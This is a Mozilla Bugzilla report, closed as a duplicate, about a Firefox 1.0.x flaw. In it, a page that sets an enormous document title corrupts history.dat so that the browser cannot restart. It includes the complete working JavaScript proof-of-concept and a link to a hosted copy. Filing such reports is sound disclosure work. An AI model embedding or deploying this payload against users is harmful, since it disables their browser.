Closed Bug 319806 Opened 19 years ago Closed 19 years ago

firefox cannot load after execute javascript code

Categories

(Firefox :: Bookmarks & History, defect)

Product:
Firefox
Component:
Bookmarks & History
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED DUPLICATE of bug 319004

People

(Reporter: mxgxw.alpha, Unassigned)

References

(
URL
)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6

We are able to prevent firefox to start, after the execution of simple javascript code.

The script try to generate a long page title, firefox continue working normally but if we close the browser it's imposibble to open it again.

Firefox loaded again only if we erase history.dat file.

Here is the proof of concept:
http://therdoggsv.net/code/xploit/xploit.html



Reproducible: Always

Steps to Reproduce:
1.Make backup of firefox data
2.Open URL described in the details
3.Close firefox
4.Open it again

Note: Javascript must be enabled.

Actual Results:  
Firefox crash after open.

Expected Results:  
Normal load of firefox.

This bug affects all versions of firefox 1.0.x. We are not tried firefox 1.5, but it will have same results.

This is the code that we use:

<html>
<head>
<script language="JavaScript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body onLoad="ex()">
</body>
</html>

*** This bug has been marked as a duplicate of 319004 ***
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE
verified, please search before you file a bug
Status: RESOLVED → VERIFIED
Component: History → Bookmarks & History
QA Contact: history → bookmarks
You need to log in before you can comment on or make changes to this bug.